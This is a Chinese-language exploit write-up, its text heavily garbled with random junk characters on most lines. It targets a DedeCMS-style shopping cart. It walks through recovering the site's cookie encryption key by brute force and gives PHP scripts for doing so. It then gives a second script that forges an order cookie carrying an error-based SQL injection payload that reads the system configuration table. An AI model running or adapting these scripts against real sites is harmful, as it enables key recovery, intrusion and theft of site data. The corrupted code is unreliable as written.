www.xxx.com/plus/search.php?keyword=: ~0 o. J- z8 B f; f) C
在 include/shopcar.class.php中/ q+ [' s% x6 \ |2 {! [
先看一下这个shopcar类是如何生成cookie的
# k( L7 X0 e W! n* o' k# ^. x239 function saveCookie($key,$value)
# Z7 r* J! i2 C; v2 z7 T4 q% _ |6 J240 {
! H3 A, t7 o' l/ k* O! e0 L& T5 M" k241 if(is_array($value))
' @0 @( s- }9 T" I242 {
0 C- T/ a# H, ^* ^- M% R! v243 $value = $this->enCrypt($this->enCode($value));
- t1 B+ M5 B' }! g" z244 }
5 C# K4 T( y1 ]% ?3 \* k# u245 else8 [% d! A9 _! x8 j j+ j
246 {4 h9 s7 _0 d# L
247 $value = $this->enCrypt($value);
3 l. P! W2 o& D N' e248 }
* ?5 P% ?; u+ a; }249 setcookie($key,$value,time()+36000,’/');: A% F, u7 q) h/ @/ G3 ]$ M- u% C
250 }8 D7 U+ C! k0 T
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
5 U) T, e. d, g1 o( M! J) M u186 function enCrypt($txt)3 o8 w& o; C% s% m% n. G7 r! ~
187 {
0 t+ r* W+ R) u# `+ E7 `- x- E188 srand((double)microtime() * 1000000);+ j t+ S2 L& L8 A! F& @
189 $encrypt_key = md5(rand(0, 32000));. C# A3 f/ c# e2 P+ T
190 $ctr = 0;. y2 S) m [" f4 P; _
191 $tmp = ”;3 Z/ }, E* u2 Z6 a7 U# m
192 for($i = 0; $i < strlen($txt); $i++)( A4 l3 {. J1 G/ v
193 {$ k' @8 p5 J& W Y$ v# g
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
2 P9 C( M* x/ z( R$ p195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);% F: [5 _3 r$ p( ?: l3 P* n" [
196 }, v4 n3 L9 H" r o1 I' u9 e
197 return base64_encode($this->setKey($tmp));: \9 S; h2 L! l3 l8 ~, G
198 }2 y! l6 L9 O- z) c+ k
213 function setKey($txt)( ? c$ D7 ?/ f
214 {) X% m& F$ h2 p! J* p
215 global $cfg_cookie_encode;
; S8 t3 S: ?. V% ]216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
! {) ~: g! i( s/ x S217 $ctr = 0;
' C, W% }# c7 L5 w+ l218 $tmp = ”;8 V2 L$ N2 ^7 o+ P3 n( @! q+ g
219 for($i = 0; $i < strlen($txt); $i++)' r+ N+ C. J- @1 p2 S5 J7 q
220 {' H1 L y8 E$ i
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
/ t+ [" q& a9 Z0 J# j8 i222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
0 h& l# d* Y( Z& s1 n! c223 }
6 B) X" ]/ t5 D% u" n! |, w n224 return $tmp;4 T. C2 O. S& E0 j0 m' r
225 }! Q" ~8 U! W/ r* H, h6 ^3 ?
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
/ b K( v5 x$ y, Y% I0 @. b. o# S然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
; [8 }2 Y9 T' ]; z$ z* L: Z具体代码如下:1 t. m" q( \. @% x
<?php' o7 V7 ?0 V+ W. N+ |- f, d5 y0 n/ i
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
t- W4 l, ?1 {: P% [$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here- F8 W9 {' o6 m" p7 r' @2 a3 z* k
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here( G& | i" m; r$ R$ c1 t
function reStrCode($code,$string)
. A4 {+ p; `5 Y0 E3 W{& p: L; Z) a0 h0 D6 B0 `
$code = base64_decode($code);" ^2 A$ K8 k7 v& z% ?: \
$key = “”;
. F( N/ Y6 S Ifor($i=0 ; $i<32 ; $i++)$ S& N* O2 {4 r; k3 S2 ^% M
{: ~, C3 L" g$ L! Q5 P$ k
$key .= $string[$i] ^ $code[$i];, u5 ^/ X2 j2 \) ] P3 |6 e3 H
}
0 W9 {2 l" w. b/ W* lreturn $key;8 ?# T! f5 M* W( J; N& S/ ^
}" ~4 S/ }* A5 C& b9 f9 j! r. a/ m
function getKeys($cookie,$plantxt)
5 v( D( P4 ~! H{ f5 W3 F3 d+ ]
$tmp = $cookie;# T# \& a1 {& ^$ I& Q" @1 o' r+ S
$results = array();, h& U9 m" ~7 V: K$ \6 v
for($j=0 ; $j < 32000; $j++)$ m7 }( X o, l2 @ i7 f. c
{
& |6 H: q$ @" M; ~9 T1 G% T6 g. U; ]$ L( Z8 r
$txt = $plantxt;
7 n5 l- R. ?. p! e$ctr = 0;
- ]: d* c3 f, k' s! {) j' g$tmp = ”;& v' ^" E) @- I, q1 o6 W
$encrypt_key = md5($j);/ j, x8 ~& A0 e5 \- c! [2 l2 L% n- ~
for($i =0; $i < strlen($txt); $i ++)
& R2 p6 i. v, L f ]4 q{
, l; d. k" t8 w8 e& m, t, n n* ~$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 |& \) V& m' v9 }
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);, |! q. f4 M- g0 h+ h% A% {6 E
}: N7 x' a; v% C; m V1 c
$string = $tmp;+ W! N1 c" c! C! @( h1 n0 L# c R
$code = $cookie;
: P8 U, k4 n O6 L$ q m$result = reStrCode($code,$string);' ?0 z: c K, b2 e
if(eregi(‘^[a-z0-9]+$’,$result))
& i% c9 a. h1 F! R# s{
2 K2 P* X6 r9 pecho $result.”\n”;
3 Z! t7 c7 R" g' }' C5 q$results[] = $result;
1 {5 G% N: [) M+ z5 r}5 ?6 k: J* ~5 ~# J) T! a
}( e" R0 h* c0 p1 N& K
return $results;4 A1 d% X# e8 h* L9 p& o/ s! z
}, t4 I( g7 _# K. U- p
$results1 = getKeys($cookie1,$plantxt);. h1 M0 T3 f8 M, h
$results2 = getKeys($cookie2,$plantxt);' _9 o. z# t- \% X+ [! o6 k
print “\n——————–real key————————–\n”;
# T. X1 I& e5 ~* E' D/ v2 ?# Iforeach($results1 as $test1)
, C# @9 h0 D- ?+ U4 M3 W8 }{
& T% e0 j4 Q8 T0 @$ f7 y+ _# k2 k4 Rforeach($results2 as $test2)6 ^9 Y& S; [4 }' ?8 ^# ]$ G
{' V3 N2 C3 ?! j( j, S
if($test1 == $test2)6 X C3 {$ O1 M# T( S
{
0 }) ^, j. A5 Q) Recho $test1.”\n”;
; K2 o& g& b" B+ E" ^8 |}5 @. V2 w* E$ K k% U
}6 ^6 ` a) m: s Z8 `; e
}
, z" @) i) t4 @5 V s?>7 }' u4 h$ |- n" ]7 R, L
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
3 S9 }" B3 [ M. }7 C+ M$ O% Xplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
/ w! o+ d. i: k然后推算出md5(strtolower($cfg_cookie_encode))
: O; y# F, a g' u% F# s$ `9 C得到这个key之后,我们就可以构造任意购物车的cookie
8 R# K. B5 P4 Y( d- `接着看6 [# ]) B8 W! j' _
20 class MemberShops
+ E }- A! o5 n6 D: V2 B21 {, S$ L* ~) K) j0 Q) ?
22 var $OrdersId;, E: E; P- `3 I% h2 }& K8 }
23 var $productsId;
$ J# }; a% g9 p24, g! m- }7 S9 e& g5 H" O, n
25 function __construct()+ ^. g& G) B& |" H
26 {* a' W$ x: r; G( a
27 $this->OrdersId = $this->getCookie(“OrdersId”);
( m7 r. H% l3 S28 if(empty($this->OrdersId))
& P1 b: ^& a6 X9 y! A29 {$ Q' `* j, ]: T. V6 v
30 $this->OrdersId = $this->MakeOrders();' z( C! G2 J' m" k8 Q* k
31 }5 c4 P- l4 C, [2 w
32 }# K0 T R# ]: z: }. M- \
发现OrderId是从cookie里面获取的# B+ B: Q: U& _- U$ U+ ?( n5 n
然后7 V! p6 I* L% v$ ^# G, a
/plus/carbuyaction.php中的
2 v( P+ i; [: f) t- S6 P9 |29 $cart = new MemberShops();" Z8 S! ]2 p6 O9 }9 |
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
b2 x4 R' R$ d7 i……
; |# a' t0 l6 v3 S173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
7 C1 P+ n! Z( s; k) C4 t接着我们就可以注入了
: d' P$ n! y( ~5 n通过利用下面代码生成cookie:! ?* A! v5 @: M
<?php! N' D0 |" u" B
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;, A; r2 R8 t4 }1 J; h
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here+ ^9 y" v8 L2 J i7 J( G
function setKey($txt); F, h$ L* ?9 f: i& j% u
{
2 n4 j& n8 k9 n& o* F7 zglobal $encrypt_key;8 J1 U% c3 X( |+ Q) y
$ctr = 0;
9 m5 z, ] U) @8 ^ H$tmp = ”;
, {# @+ d+ Y g- z# @4 ^( mfor($i = 0; $i < strlen($txt); $i++)
. \0 H; [; N6 c( F% u" [{
4 V6 {( h6 ]6 c' U$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( y! o1 Q p, w
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];9 Z1 F+ h$ M$ I8 o8 [3 D7 ?
}1 B7 F9 d7 Q) B6 w* P, o' x' \
return $tmp;4 F/ q6 w' y& X2 f# D5 S! g+ f. K
}
) I4 F( C( W% V- s# `function enCrypt($txt)7 t/ l6 M# Y' }) b ^. A
{
4 @- T/ E% N# }2 dsrand((double)microtime() * 1000000);3 a' g& n. Q8 K% W; j
$encrypt_key = md5(rand(0, 32000));4 O% M x& a6 N) ~
$ctr = 0;3 j2 V5 I V( o$ R
$tmp = ”;) U. o& J- F0 @4 v
for($i = 0; $i < strlen($txt); $i++)
% a I+ a6 ?9 u{( N$ }. s' e# O2 Y8 n+ e/ B! Y' u
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;! `) p: s% [" } z! Y# @$ N$ J7 Y
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
' U' S0 b# f! o}
) u* s3 j. V0 p/ R" ^return base64_encode(setKey($tmp));
2 _5 P# \ F6 e$ k3 t& A( B4 S* E. K}! _5 { h4 M2 G& _; I
for($dest =0;$dest = enCrypt($txt);)5 @0 U' ^0 b$ \: U" z
{
* f. ^5 W t$ L1 g- r, }, r# ]if(!strpos($dest,’+'))
?0 c8 o/ [- _! G) t! g{
; L: q7 S; r2 u/ w" _: rbreak;1 X9 O, J5 B3 ~7 W
}
/ S, b0 M, j0 k: Y! o& l7 R0 X7 o}
% e0 ^. [7 h2 \echo $dest.”\n”;
, [0 v7 {: q# h?>
/ M) ]: ~# B9 O( v3 @ v; I$ F( p& E; y/ R- n
|